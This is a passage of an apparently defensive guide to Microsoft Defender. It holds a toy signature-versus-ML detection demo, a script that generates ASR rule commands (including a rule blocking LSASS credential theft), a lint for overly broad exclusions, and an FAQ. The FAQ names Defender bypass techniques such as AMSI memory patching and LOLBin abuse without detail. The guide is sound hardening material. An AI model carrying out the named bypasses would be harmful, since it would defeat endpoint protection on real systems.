    (suspiciousImports > 5 ? 0.3 : 0) +
    (isPacked ? 0.3 : 0);
  return { malicious: score > 0.5, confidence: score };
}

// Polymorphic malware: same behavior, different hash every time
const malwareHashes = ['abc123', 'def456', 'ghi789'];
const signatureDB = ['abc123']; // Only first variant known

console.log('--- Signature-Based Detection ---');
malwareHashes.forEach((hash, i) => {
  const detected = signatureDetect(hash, signatureDB);
  console.log('Variant ' + (i + 1) + ' (' + hash + '): ' + (detected ? 'DETECTED' : 'MISSED'));
});

console.log('\n--- ML-Based Detection ---');
// All variants share behavioral features despite different hashes
const sharedFeatures = { entropy: 7.8, suspiciousImports: 8, isPacked: true };
malwareHashes.forEach((hash, i) => {
  const result = mlDetect(sharedFeatures);
  console.log('Variant ' + (i + 1) + ': ' + (result.malicious ? 'DETECTED' : 'MISSED') + ' (confidence: ' + result.confidence + ')');
});

console.log('\nSignatures caught 1/3 variants. ML caught 3/3.');
console.log('This is why 96% of unique malware requires ML, not signatures.');
```

ASR Rules: What to Enable

Note: Always deploy ASR rules in audit mode first (Mode = 2) and monitor for false positives in your environment before switching to block mode (Mode = 1). Aggressive ASR rules can break legitimate line-of-business applications.

The highest-impact ASR rules to enable first [@asr-rules]:

Block Office applications from creating child processes
Block credential stealing from the Windows local security authority subsystem (LSASS)
Block executable content from email client and webmail
Block abuse of exploited vulnerable signed drivers
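Staging these four rules through audit mode and then block mode can be scripted. The JavaScript sketch below only generates PowerShell `Add-MpPreference` commands; it does not run them. The rule GUIDs are reproduced from Microsoft's ASR rules reference and should be verified against the current version of that page before deployment. The phase names `AuditMode` and `Enabled` are the `-AttackSurfaceReductionRules_Actions` values that correspond to Mode = 2 and Mode = 1.

```javascript
// Sketch: generate (not execute) PowerShell commands that stage the ASR rules above.
// Verify the GUIDs against Microsoft's current ASR rules reference before use.
const ASR_RULES = {
  'Block Office applications from creating child processes': 'd4f940ab-401b-4efc-aadc-ad5f3c50688a',
  'Block credential stealing from LSASS': '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2',
  'Block executable content from email client and webmail': 'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550',
  'Block abuse of exploited vulnerable signed drivers': '56a863a9-875e-4185-98a7-b882c64b5ce5',
};

// 'AuditMode' corresponds to Mode = 2, 'Enabled' (block) to Mode = 1.
const PHASES = new Set(['AuditMode', 'Enabled']);

function asrCommands(phase) {
  if (!PHASES.has(phase)) throw new Error('unknown phase: ' + phase);
  return Object.entries(ASR_RULES).map(([name, id]) =>
    `# ${name}\nAdd-MpPreference -AttackSurfaceReductionRules_Ids ${id} -AttackSurfaceReductionRules_Actions ${phase}`);
}

// Phase 1: audit everything; switch to 'Enabled' only after reviewing audit hits.
console.log(asrCommands('AuditMode').join('\n'));
```

Rejecting unknown phase names guards against typos that would otherwise produce commands PowerShell refuses, or worse, a mode you did not intend.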

Common Pitfalls

The most common Defender misconfiguration is overly broad antimalware exclusions -- excluding entire directories or file types for performance reasons. Attackers actively target excluded paths; if `C:\Temp` is excluded, dropping malware there bypasses all scanning. Always exclude the narrowest possible path, and audit your exclusions regularly.
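Auditing exclusions can start with a simple lint pass. The JavaScript sketch below assumes exclusion paths and extensions have already been exported, for instance the `ExclusionPath` and `ExclusionExtension` values from `Get-MpPreference`. The list of commonly writable directories, the risky-extension list, and the rules themselves are illustrative heuristics, not Microsoft guidance.

```javascript
// Hypothetical lint for Defender exclusion lists. The directory and extension
// lists are illustrative assumptions about what counts as "too broad".
const WRITABLE_DIRS = ['c:\\temp', 'c:\\windows\\temp', 'c:\\users\\public', '%temp%', '%appdata%'];
const RISKY_EXTENSIONS = ['exe', 'dll', 'ps1', 'js', 'vbs', 'bat', 'hta'];

function lintExclusions({ paths = [], extensions = [] }) {
  const findings = [];
  for (const raw of paths) {
    const p = raw.toLowerCase().replace(/\\+$/, ''); // normalize case, drop trailing slashes
    if (/^[a-z]:$/.test(p)) findings.push(`${raw}: excludes an entire drive`);
    else if (p.includes('*')) findings.push(`${raw}: wildcard widens the exclusion`);
    else if (WRITABLE_DIRS.some((d) => p === d || p.startsWith(d + '\\')))
      findings.push(`${raw}: commonly writable location attackers can drop files into`);
  }
  for (const raw of extensions) {
    const e = raw.toLowerCase().replace(/^\*?\./, ''); // accept "exe", ".exe", "*.exe"
    if (RISKY_EXTENSIONS.includes(e)) findings.push(`.${e}: excludes an executable or script type everywhere`);
  }
  return findings;
}

console.log(lintExclusions({
  paths: ['C:\\Temp', 'D:\\', 'C:\\Program Files\\LOBApp\\cache'],
  extensions: ['.exe', 'log'],
}));
```

The narrow application cache path passes. The whole-drive exclusion, the writable `C:\Temp`, and the blanket `.exe` exclusion are each flagged.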

Note: Organizations that disable cloud-delivered protection for performance or privacy reasons lose the most powerful detection layer. On-device models alone miss an estimated 10--15% of threats that cloud models catch. If privacy regulations require limiting telemetry, use the "Send safe samples automatically" option rather than disabling cloud protection entirely.

Other common pitfalls:

Agent conflicts: Running multiple endpoint protection agents in active mode simultaneously (e.g., Defender + CrowdStrike) causes performance degradation and detection conflicts. Keep one agent active and run Defender in passive mode.
Delayed signature updates: Organizations with restricted update policies may have definition databases days behind, creating unnecessary vulnerability windows.

Frequently Asked Questions

Is Microsoft Defender good enough on its own?
For most consumers and Microsoft 365 enterprise environments, Defender provides top-tier protection. It consistently scores 6/6/6 on AV-TEST and achieved top-tier MITRE ATT&CK Enterprise results with zero false positives in 2024. Third-party solutions like CrowdStrike or SentinelOne may be preferable if you need specialized managed threat hunting or autonomous offline protection, or if your organization is not in the Microsoft 365 ecosystem.

Does Defender slow down my computer?
AV-TEST consistently gives Defender 6/6 for performance impact -- meaning minimal slowdown on standard operations. Cloud-based analysis offloads heavy ML inference to Microsoft's servers, keeping the on-device footprint light. Some users notice brief delays when opening unusual files for the first time (Block at First Sight holds the file while it waits for a cloud verdict), but this typically resolves in under a second.

Does Defender protect against ransomware?
Yes, through multiple layers. Controlled Folder Access blocks unauthorized modification of protected directories. ASR rules block common ransomware delivery vectors (Office macros spawning processes, email-delivered executables). Cloud ML detects known and novel ransomware variants. Tamper Protection prevents ransomware from disabling Defender. However, no endpoint protection product can guarantee 100% ransomware prevention -- maintain offline backups as a last-resort defense.

Is Windows Security the same as Defender for Endpoint?
No. Consumer Windows includes Windows Security (next-gen AV, cloud protection, firewall). Enterprise customers get Defender for Endpoint Plan 1 (adds ASR rules, conditional access, Tamper Protection -- included in M365 E3) or Plan 2 (adds EDR, automated investigation, threat hunting, Security Copilot -- in M365 E5). The detection engine is the same, but enterprise tiers add investigation, response, and management capabilities.

Does Defender work on macOS, Linux, and mobile devices?
Yes. Since 2019--2020, Microsoft Defender for Endpoint supports macOS (behavioral monitoring engine), Linux (initially auditd-based sensor, migrated to eBPF in 2023), Android, and iOS. Feature parity lags behind Windows -- the macOS and Linux sensors don't have AMSI or the same depth of OS integration -- but cross-platform support is real and improving with each release.

What happens if I install a third-party antivirus?
Defender can operate in passive mode -- it monitors the system and provides scan-on-demand capability but does not perform real-time protection. If the third-party AV is removed or its subscription expires, Defender automatically re-enables. Running two real-time AV agents simultaneously causes performance degradation and detection conflicts.

Can Defender be bypassed?
Yes. Every endpoint protection product can be bypassed -- this follows from Fred Cohen's undecidability result for general virus detection. Specific Defender bypass techniques include AMSI memory patching, LOLBin abuse, fileless in-memory execution through non-AMSI-integrated paths, and adversarial ML evasion. Microsoft continuously patches known bypasses, but the arms race is inherent to the problem. Defense in depth -- using multiple security layers, not just one product -- is the practical mitigation. See the Open Problems section above for analysis of LOLBin abuse and adversarial ML evasion, along with current defenses. Organizations can test their detection posture against known bypass techniques using open-source tools like Atomic Red Team.